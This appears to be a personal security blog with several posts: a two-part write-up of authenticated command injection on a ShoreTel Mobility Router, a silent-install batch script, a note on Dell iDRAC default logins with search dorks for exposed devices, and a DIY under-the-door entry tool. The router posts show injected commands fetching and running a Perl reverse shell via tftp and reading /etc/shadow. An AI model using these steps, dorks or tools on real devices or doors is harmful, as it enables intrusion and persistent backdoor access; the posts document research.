But still I was dogged by the Read Only filesystem deal. Even in directories where I had full permissions I still could not write to a file. I spent a while looking for a writable directory.<br />
<br />
Then I thought about the /tmp directory. Not much use in a tmp directory if you can't write to it. <br />
<br />
I added a && echo 1 > /var/root/tmp/text.txt && ls -la /var/root/tmp<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0V6XvftVUaaVYb79asid-W0D7nmLsv7e-zW7qNxxrxUPKydvdVayN5Vlw7cKZAk7I9zt1ae7V5SZBSXqh0iExVSoKw0TNHtGnqmg0MsqHUNWgKaTTWAG6J5RmQVc1iQQSMuVlGgUkRek/s1600/test.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0V6XvftVUaaVYb79asid-W0D7nmLsv7e-zW7qNxxrxUPKydvdVayN5Vlw7cKZAk7I9zt1ae7V5SZBSXqh0iExVSoKw0TNHtGnqmg0MsqHUNWgKaTTWAG6J5RmQVc1iQQSMuVlGgUkRek/s640/test.bmp" width="640" /></a></div>
<pre>Sweet tap dancing tuna fish, test.txt. Finally, a writable directory.</pre>
<pre> </pre>
I had noticed earlier that Perl is installed, so I figured that a Perl shell would probably be the easiest way to go.<br />
I setup a tftp server and put a Perl shell I've used a few times before on in.<br />
<br />
Then I went back to the web interface and entered<br />
<br />
&& cd /var/root/tmp && tftp hostname -c get plshell.pl && chmod +x /var/root/tmp/plshell.pl<br />
<br />
*why the tftp -c? I have no idea, this particular implementation of TFTP client wanted a -c for the command. I've never had to use it before. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7TXXZXhbl6Uj4KgdWCOWaaxyDcMkRsuCdC7GpQAADNwewZDiLNQrmk8viuXySxN6VdYpzk_0FeOKR0gx8vlQ-G8UnnxpSA2DvC9nBZc3cvsOh8idgZ0-C7iZdGcKNAvmv87FcDqP039I/s1600/executiveperl.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7TXXZXhbl6Uj4KgdWCOWaaxyDcMkRsuCdC7GpQAADNwewZDiLNQrmk8viuXySxN6VdYpzk_0FeOKR0gx8vlQ-G8UnnxpSA2DvC9nBZc3cvsOh8idgZ0-C7iZdGcKNAvmv87FcDqP039I/s640/executiveperl.bmp" width="640" /></a></div>
The perl shell can be found here: http://pentestmonkey.net/tools/web-shells/perl-reverse-shell<br />
Thanks pentestmonkey, your pentest cheatsheet has saved my bacon a few times. <br />
<br />
Now we execute it and viola!<br />
(https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp && /var/root/tmp/plshell.pl) <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWeTG_ZC4R3JnBtz2GmGwz_gYhQpqpzzgryWG8fsTfDG2ATCoqkYeRldLpTjkXPtwfGz5f3YztLYzVzt9NU5oav1LvNskgbx9hTrWAdwJyYE74hIhGtc7D1Hj35yQc92yV6JaZVBI0xiE/s1600/victory.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWeTG_ZC4R3JnBtz2GmGwz_gYhQpqpzzgryWG8fsTfDG2ATCoqkYeRldLpTjkXPtwfGz5f3YztLYzVzt9NU5oav1LvNskgbx9hTrWAdwJyYE74hIhGtc7D1Hj35yQc92yV6JaZVBI0xiE/s640/victory.bmp" width="640" /></a></div>
<br />
We have shell.<br />
<br />
And that's pretty much that. The admin user has the same permissions as the root user. Since we were executing commands as the admin user instead of Apache we didn't have to find any privilege escalation exploits or kernel vulnerabilities. Kind of takes the fun out of it when you already have all the rights you need.<br />
<br />
<u><b>The Root Password</b></u><br />
<br />
And now the moment I spent a bunch of time waiting for, the ever beloved cat /etc/shadow and seeing the root hash, that beautiful juicy root hash, just sitting there, waiting to be cracked, to have it's secret revealed, to be removed from the shadows and thrust into the light of knowledge and understanding..........<br />
<br />
root:!!:10000:0:99999:7:::<br />
<br />
F*CK YOU!!! Really? A blank freaking password?<br />
<br />
This made me sad, all the work and I didn't even get to crack a hash.<br />
<br />
Well you can't win them all I guess.<br />
<br />
<br />
So.. this leaves me in a situation that I don't really like. All I've accomplished is to take the privleges I had, and use them to get a different means to access a device I already had access to. While it is handy to have an actual shell to access the device instead of just a web interface and terminal program that you access when you SSH in, I still feel pretty cheated about the whole deal. In the short run I've accomplished what I set out to do, I found a way to load a backdoor onto the system.<br />
<br />
However, lets face it, you have to have the admin user credentials to log into the device, there's not much cool stuff happening here.<br />
<br />
Now I start my search for a means of unauthenticated access to the device. Perhaps there's a way to steal a session cookie by writing some kind of xss deal into the log files. Maybe they send the authentication cookie in the clear and I can snag it with a sniffer. Maybe they're still running a vulnerable version of SSL or Apache server or FTP, I doubt it, but just maybe. Perhaps there's still yet some other way to compromise this device.<br />
<br />
The fight is over, but the battle rages on.<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-18500047833604496012013-01-24T10:05:00.000-10:002013-02-20T04:51:49.231-10:00Command Execution on Shoretel Mobility RouterUPDATE: Part 2 of this is located <a href="http://blakhal0.blogspot.com/2013/02/command-execution-on-shoretel-mobility.html" target="_blank">here</a> <br />
<br />
<br />
**This post is still a work in progress, only command execution as a limited user has been accomplished** <br />
<br />
At the moment this is isn't all that impressive, sorry to anyone looking for 1337 sploitz.<br />
<br />
Requires auth, runs as a limited user (apache).<br />
<br />
One of the reasons that this device peaked my interest is the way that it's designed to run, it's intended to sit with one interface on the DMZ and another interface on the internal network. That's a gold mine as it lives in both worlds. The downside is that you have to start on the inside to get to the config interface, that you have to have the credentials to be able to log into, to start this. So this would be a post initial infiltration, and setting up persistent access type of thing. Plus no one is going to audit this machine as you don't get the root credentials when you buy it so it's about the most perfect device to setup as a persistent access point.<br />
<br />
I recently had the opportunity to experiment with Shoretel's Mobility Router. While I was watching the demonstrator demo the unit I saw this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDCR_l2Mc9Pn2cZvP1Gphy9KP3P8Z_AIjXFeiMukQ3ulgy5MeQgafUkR2-ymXM3LJQkYPCCR0rJ6bXkcoJPj_Z0gf7V57X3uXfWrdFh-X8W7mbC1Css_jxvwSxIROvUvz2_bGl0ohGfhI/s1600/beginning.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDCR_l2Mc9Pn2cZvP1Gphy9KP3P8Z_AIjXFeiMukQ3ulgy5MeQgafUkR2-ymXM3LJQkYPCCR0rJ6bXkcoJPj_Z0gf7V57X3uXfWrdFh-X8W7mbC1Css_jxvwSxIROvUvz2_bGl0ohGfhI/s640/beginning.bmp" width="640" /></a></div>
<br />
When I saw that it had the option to run some commands from the web interface I was very hopeful that this could be a command chaining vulnerability.<br />
<br />
If I can define part of the command perhaps I can tag some extra stuff on the end and execute my own commands. Maybe I can add "; whoami" or "&& whoami" to the end and have the system execute this command instead of just ping:<br />
ping $host ; whoami<br />
This would ping the host, then as long as it was successful it would also execute whoami. <br />
or<br />
ping $host && whoami <br />
This would ping the host and do a whoami.<br />
<br />
Initially this didn't work, as the site filters all the characters that aren't alpha numerical. That includes the space character. So I couldn't type in " ; whoami" or "&& whoami". I also couldn't use %XX because the % character is not allowed. So I couldn't type what I wanted in to the field, I could only put in alpha or numerical input, no spaces, no special characters.<br />
<br />
My next step was to see if the filters were on the webpage and the back end or just the web page.<br />
<br />
So I turned on Tamper Data plugin and set to work to figure it out.<br />
<br />
I put in 127.0.0.1 in the host field hit submit and this is what I saw:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrfVUAWTfRARUIjiJfoUuEzHJWBCfq3LjzXFynbkLF68fJ5Xi2mdIYx16JnoSQzNKYepCTcdzFqQxLcYvpeCdKLInUqL8jWbrblFLECl7ZbeY_H8misjZH9Ce6pmTSwBJFB2Tv7xTVeZo/s1600/tamper.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrfVUAWTfRARUIjiJfoUuEzHJWBCfq3LjzXFynbkLF68fJ5Xi2mdIYx16JnoSQzNKYepCTcdzFqQxLcYvpeCdKLInUqL8jWbrblFLECl7ZbeY_H8misjZH9Ce6pmTSwBJFB2Tv7xTVeZo/s1600/tamper.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja3XdsibTXkfMtJnhtLK-fAyDGOuJl7Jt8QyXZO6YdKcA9iXiLRYn9_Fcl48rnfWRwfypo20d4ptb328OCGg8rxUoxUEQzWPbRwhz0OBcdAGFqZY6uNaoJZu9gJ3Xc4z3vFOY3N5LEvfg/s1600/ls-l.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br />
There in the post data I see the data I entered into the fields and the command.<br />
<br />
As luck would have it they rely completely on the webpage to filter all
input. So while I may not be able to type what I want into the field I
can tamper with what actually gets sent to the system with a web proxy
and put my commands in there. <br />
<br />
After a few trial and error attempts at modifying the field data sent to the ping command I realize something.<br />
Whoa, wait a minute, it has an option to choose the command, lets see if this is limited to the options on the page.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobOxdrjtuN4p1u2y7AFAYm7_u3SXAND9A_-S9MSIGcFyPvDyw9EBPz4ekoRopN_3WFrK_iinm0tkRsVpK7MZUckayiMckJSlkeRanIQSUf7Pt_cHwk4qFsRjyLsJ4MP3JkEfW9gbjNvg/s1600/tampered.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobOxdrjtuN4p1u2y7AFAYm7_u3SXAND9A_-S9MSIGcFyPvDyw9EBPz4ekoRopN_3WFrK_iinm0tkRsVpK7MZUckayiMckJSlkeRanIQSUf7Pt_cHwk4qFsRjyLsJ4MP3JkEfW9gbjNvg/s1600/tampered.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
So I get rid of everything and just put in command=whoami </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This is what pops up on the webpage when I hit submit from Tamper Data: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFgtf122bXjE5D98-aLAbBSnVVtFRn7HbwhdCgBjSGfrzpkKkuNuQOi_W99GkqhW6cwRhVikkCqztMAyBm8-D-q7Q_OZCsMlLr6xTvWNeVoCmg8brj179_qmAQDltebo0FtXRyqLIAvA8/s1600/answer.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFgtf122bXjE5D98-aLAbBSnVVtFRn7HbwhdCgBjSGfrzpkKkuNuQOi_W99GkqhW6cwRhVikkCqztMAyBm8-D-q7Q_OZCsMlLr6xTvWNeVoCmg8brj179_qmAQDltebo0FtXRyqLIAvA8/s1600/answer.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now this is looking promising. I'm running as the apache user but I can execute commands outside of the available set in the drop down list.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Lets try a directory listing:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja3XdsibTXkfMtJnhtLK-fAyDGOuJl7Jt8QyXZO6YdKcA9iXiLRYn9_Fcl48rnfWRwfypo20d4ptb328OCGg8rxUoxUEQzWPbRwhz0OBcdAGFqZY6uNaoJZu9gJ3Xc4z3vFOY3N5LEvfg/s1600/ls-l.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja3XdsibTXkfMtJnhtLK-fAyDGOuJl7Jt8QyXZO6YdKcA9iXiLRYn9_Fcl48rnfWRwfypo20d4ptb328OCGg8rxUoxUEQzWPbRwhz0OBcdAGFqZY6uNaoJZu9gJ3Xc4z3vFOY3N5LEvfg/s640/ls-l.bmp" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIfNyfZcafPCDQk3WOFjLkVU0uPAsS3HtfYa2yxjdQcL_r4uezYT6EDlO_-IabwcrmxvzXsWWFMUGkPz8wekFiakCYqCh5uXrZET_UZwBW-c6v-NxiQdTb9KHshfQyaNQ2iV2_s5lNrb4/s1600/tampered.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: left;">
You have to encode any space characters but it seems pretty lenient on any other special characters accepting either the character outright or the hex representation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBjbch5T9i8HQJqDZrQVhS_5sogLHEPjU4PIt4vK881WAGkYpattANAOmtAL_IyQAsq42MmIbZ8OtcablzkeN9VR4c2GfHfY4L4hwajGUvhGAUM5TAlwmBV47MoGz-Ba0_roHrofr1-j0/s1600/ls-l-answer.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBjbch5T9i8HQJqDZrQVhS_5sogLHEPjU4PIt4vK881WAGkYpattANAOmtAL_IyQAsq42MmIbZ8OtcablzkeN9VR4c2GfHfY4L4hwajGUvhGAUM5TAlwmBV47MoGz-Ba0_roHrofr1-j0/s1600/ls-l-answer.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So the theory is sound, I've found a way to issue commands directly to the system, albeit with a limited user. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next step is to find a directory we can write to and try to upload something to get us a shell.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
* While it is possible to SSH into the machine, you're not able to SSH in as root, because you don't know the password. When you SSH in as the admin user you're automatically dumped into a configuration program and you're not able to interact with the OS directly.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
That's all for now.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next episode, getting shell and the path to root.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
UPDATE: Part 2 of this is located <a href="http://blakhal0.blogspot.com/2013/02/command-execution-on-shoretel-mobility.html" target="_blank">here</a> </div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-7601484588778663402012-12-12T06:53:00.000-10:002013-05-13T03:12:41.696-10:00Silent Install Of Shoretel Communicator without RebootHere's how to install Shoretel Communicator 12.3 silently, remotely, and without an automatic reboot.<br />
<br />
Download the communicator install from your HQ server. <br />
<br />
Please note that Communicator will not work properly until the PC has been restarted. I'll have to check into that later I assume it just needs a service restarted.<br />
<br />
Here's the entire script I wrote up.<br />
1. We do a check to see if it's a x86 or x64 PC, we get that from the SystemInfo command.<br />
2. Then we set the appropriate path using the variable spth.<br />
<br />
DO NOT USE THE WORD "PATH" AS YOUR VARIABLE NAME<br />
It's a bad idea and it will end badly for you. I ALMOST made that mistake, but I have the good habit of re-reading a script one more time before I execute it. Saved my bacon.<br />
<br />
3. Determines if Communicator is already installed, then either forks it to the install section or the end function.<br />
<br />
The install command line to get a silent non rebooted install of communicator is as follows:<br />
<br />
setup.exe /S /v"/qn REBOOT=reallysuppress"<br />
<br />
now it's an installshield that's wrapped around an MSI so the switches are split.<br />
/S and /v are for the installshield setup. /S is Silent /v is variable to pass to the msi installer.<br />
You can pass multiple variables / switches to the MSI by enclosing them in " ". Notice there is no space between the /v and the ". Spaces inside the " " are okay.<br />
<br />
Here's the script:<br />
<br />
@echo off<br />
cls<br />
systeminfo | find /i "System Type" | find /i "X86-based PC"<br />
if %errorlevel% == 0 set spth="C:\Program Files\Shoreline Communications\ShoreWare Client\Shoretel.exe"<br />
Echo Checking System Type (x86 vs x64)<br />
systeminfo | find /i "System Type" | find /i "X64-based PC"<br />
if %errorlevel% == 0 set spth="C:\Program Files (x86)\Shoreline Communications\ShoreWare Client\Shoretel.exe"<br />
<br />
Echo Checking if Communicator is already installed.....<br />
if exist %spth% goto end1<br />
if NOT exist %spth% goto install<br />
<br />
:install<br />
echo Installing Shoretel Communicator<br />
\\fileserver\installs$\ShoreTel\setup.exe /S /v"/qn REBOOT=reallysuppress"<br />
echo Installation Finished<br />
exit<br />
<br />
:end1<br />
echo Shoretel Communicator is already installed.<br />
ping 127.0.0.1 -n 5 > nul<br />
exit<br />
<br />
Psexec or use your favorite method of pushing out an install and you're golden.Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-7776905799486744720.post-82827402550027711062012-10-03T04:41:00.000-10:002012-10-03T04:49:05.648-10:00iDRAC in the WildiDRAC is Dell's remote management feature. It comes in 2 flavors Basic and Enterprise. Like most things it comes with a default user name and password combo (root calvin). Unfortunately it does not require you to change it before it becomes enabled. So you can have iDRAC run with the default user and pass.<br />
<br />
Well obviously that's not good.<br />
<br />
Dave Kennedy recently made a post about using this during a penetration test. <a href="https://www.trustedsec.com/september-2012/owning-dell-drac-awesome-hack/" target="_blank">Blog Post at Trusted Sec</a><br />
The scanner he wrote is the best part. <br />
<br />
With the Enterprise version you get a virtual console and the ability to load virtual media to boot from. So load up your favorite live cd reboot and get pwning. <br />
<br />
So I thought to myself, well I wonder if people have this default configuration but with a public address, that could cause all kinds of problems.<br />
<br />
They do, and there are many of them with the default login from the small amount of searching I've done. <br />
<br />
The biggest problem I see, aside from the obvious threat to your entire network, is that someone could launch a live cd, setup a temporary server, do what ever evil deeds need done then reboot back to the normal boot device and all evidence is gone. What a fantastic jump point to attack some other network. Need a server for about 20 minutes to drop some files and want to make sure no evidence remains after that? iDRAC is the way to go.<br />
<br />
Google Search : intitle:"Integrated Dell Remote Access Controller 6 Enterprise" <br />
Shodan Search : 2.6.24-ami (Just one example)<br />
<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-613169044691209652012-09-11T11:46:00.000-10:002012-09-12T03:13:11.211-10:00DIY Under the Door (MULE) ToolThere's been a lot of dust kicked up over this type of tool. It seems to be a coveted item for some reason. I don't get it personally but I saw it and I made one. I think I did a pretty solid job and it works perfectly.<br />
<br />
I picked up a 6' rod of 3/16th's steel at my local hardware store. That sounds like a lot but I didn't have to trim any of it.<br />
I got some string from the same store.<br />
<br />
Total Cost: about $8<br />
<br />
I just used a large pair of channel lock pliers and my hands to make all my bends. No special tools required.<br />
<br />
You have to use some caution making the bends as if you make a bend too sharp you're going to have a pretty rough time getting it straightened back out.<br />
<br />
<br />
Here it is in full glory:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4AUPNbJCXLk3_DUQTZSTYkqw1VOkQ6TmCEfUYzZEyemutEo9Ggm54YzN-7fvKjD66eupOLKgsumKBNVhdXgKxB1tDSrHuQ_yOhytm_T4NRuzwLO92lPnoEWhHrkn7isqXcXwIsaj_2e8/s1600/Full+Glory.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4AUPNbJCXLk3_DUQTZSTYkqw1VOkQ6TmCEfUYzZEyemutEo9Ggm54YzN-7fvKjD66eupOLKgsumKBNVhdXgKxB1tDSrHuQ_yOhytm_T4NRuzwLO92lPnoEWhHrkn7isqXcXwIsaj_2e8/s320/Full+Glory.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Under The Door Tool (MULE)</td></tr>
</tbody></table>
Here's some pictures with measurements:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0tFGRVJc7lIiViDhHpg8TV3wVrbfBYMdKqNKeFb4_kacTaEwa7ECJdj4O1XC8dvipBJAG4hdFgPNSQXUN2rz5X7Sl3R_lL1_pZlNbI0tUlCQR8h-jghzeeWfEsacT-2vWmWM2zcVi6zA/s1600/Full+Measure.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0tFGRVJc7lIiViDhHpg8TV3wVrbfBYMdKqNKeFb4_kacTaEwa7ECJdj4O1XC8dvipBJAG4hdFgPNSQXUN2rz5X7Sl3R_lL1_pZlNbI0tUlCQR8h-jghzeeWfEsacT-2vWmWM2zcVi6zA/s320/Full+Measure.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From Top of the Lever Catch to the Bottom of the Curve 42"</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx6w67SkI9TnbTYyz127bCV8QJtASIlRO8bxmCDZkPFUUDY_jBWMwJJguMb3x0PInuGmTuD-rq8VN0Y-uUlF4f3IJ4OzEWkSffw0fcKYEShcOlX-T1x3uzkc-d74fgkFBvv64ANLorhJ4/s1600/Full+Measure+Proof.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx6w67SkI9TnbTYyz127bCV8QJtASIlRO8bxmCDZkPFUUDY_jBWMwJJguMb3x0PInuGmTuD-rq8VN0Y-uUlF4f3IJ4OzEWkSffw0fcKYEShcOlX-T1x3uzkc-d74fgkFBvv64ANLorhJ4/s320/Full+Measure+Proof.jpg" width="217" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Proof it's actually 42"</td></tr>
</tbody></table>
Note that the doors I tested these on have the handles at 41". That may not be the case for your locale, get a tape measure and go get some weird looks, find an average that works for you.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheqs2gzlqoWT2oEYBqQMVgQsCqjf0mphXbxFeFJLsruiPcuuR4VkidyXLEsapcNGu6HHwLD3tLpe7sUIQjlcC0tvivRwovd3_RPIbKJGytZLbbKE0g7rrsq5pZhrY5V2BbfhEzuinzDhw/s1600/Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheqs2gzlqoWT2oEYBqQMVgQsCqjf0mphXbxFeFJLsruiPcuuR4VkidyXLEsapcNGu6HHwLD3tLpe7sUIQjlcC0tvivRwovd3_RPIbKJGytZLbbKE0g7rrsq5pZhrY5V2BbfhEzuinzDhw/s320/Bottom.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From shaft to handle 14"</td></tr>
</tbody></table>
The hoop, I didn't have any accurate measurement on the angle I just kinda guessed knowing that I needed to keep the handle away from the door so I could operate it but also needed to make sure the angle wasn't too wide so that the top where the string attaches would actually come back into contact with the door. The about a paint can estimate from <a href="http://darksim905.com/lockpicking.php" target="_blank">darksim905 lockpicking</a> seems to be about right, I just shaped it by hand but it seems to have worked out.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCg9Ly2vJjDpScm-FIiXlLsdSK_fGVd75rHonwpmQRG2qZvsp8bESU3LBx3D9ABxC-TMRj9iZLnpu_dAIVxnTWU0WcB-xHbrZAkC2PS9EBnHgS6fsqwp-FpvvwP1Hh5IZdQbKxfjrIw0g/s1600/Handle.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCg9Ly2vJjDpScm-FIiXlLsdSK_fGVd75rHonwpmQRG2qZvsp8bESU3LBx3D9ABxC-TMRj9iZLnpu_dAIVxnTWU0WcB-xHbrZAkC2PS9EBnHgS6fsqwp-FpvvwP1Hh5IZdQbKxfjrIw0g/s1600/Handle.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">4.5" for the handle.</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
I've found it's a lot more comfortable for me to actually hold the whole handle instead of trying to put my hand through it to hold it. Adjust for your hand size / comfort.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuzHQIBlTEgrXrMGy6Om10T6vXho0jl0Hwp9SH6WAVrtNUSOnJ3UlZUSw71FG_ZpIebFkD-1Lz9pdMV7DbGhC2SRI8x5FhyphenhyphenpOzK-DUzE6e1LvRDzMlvTADKWLB-b_tepm5lb9sqbpq4fQ/s1600/Top.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuzHQIBlTEgrXrMGy6Om10T6vXho0jl0Hwp9SH6WAVrtNUSOnJ3UlZUSw71FG_ZpIebFkD-1Lz9pdMV7DbGhC2SRI8x5FhyphenhyphenpOzK-DUzE6e1LvRDzMlvTADKWLB-b_tepm5lb9sqbpq4fQ/s320/Top.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Just over 6" for the top</td></tr>
</tbody></table>
I would like to note here that there is a design flaw. The loop where the rope attaches to needs to have it's lowest point nearest the door so the rope stays in place. Where the string is attached now should be the lowest point in the hoop, perhaps more of a triangle design, or something to hold it there. As it stands right now the rope has too much room to travel and, as you will see in the videos below, can cause it to miss the space between the door and the handle.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvS7vDbhZwX5Oqu_li4uQEHR9gqFX0zcJvNCFXZHbPBVfF90nUBLi8M468giJSUvzwqk1uBZaxKxF9lUuT69AH7yZcypRihcinMtYwUJcw_2T_Qod7QfiQrhvnmQu0BnvEuNLDRVlAEiE/s1600/Rope.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvS7vDbhZwX5Oqu_li4uQEHR9gqFX0zcJvNCFXZHbPBVfF90nUBLi8M468giJSUvzwqk1uBZaxKxF9lUuT69AH7yZcypRihcinMtYwUJcw_2T_Qod7QfiQrhvnmQu0BnvEuNLDRVlAEiE/s1600/Rope.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">End of the Rope 5'</td></tr>
</tbody></table>
The 5' rope is a completely arbitrary number, seems to be about right though. Maybe a little shorter would work just as well. I do need to find another material and this is already starting to show signs of wearing where it scrapes against the bottom of the door when pulling to activate the handle.<br />
<br />
<br />
Here's 3 videos of it in use. I've included the fail videos to dispel the theory that this is magic and everyone gets it on the first try. I hate videos that only show things working, you learn nothing from things working, you learn from things not working. It's not a complicated tool, but there are some caveats.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
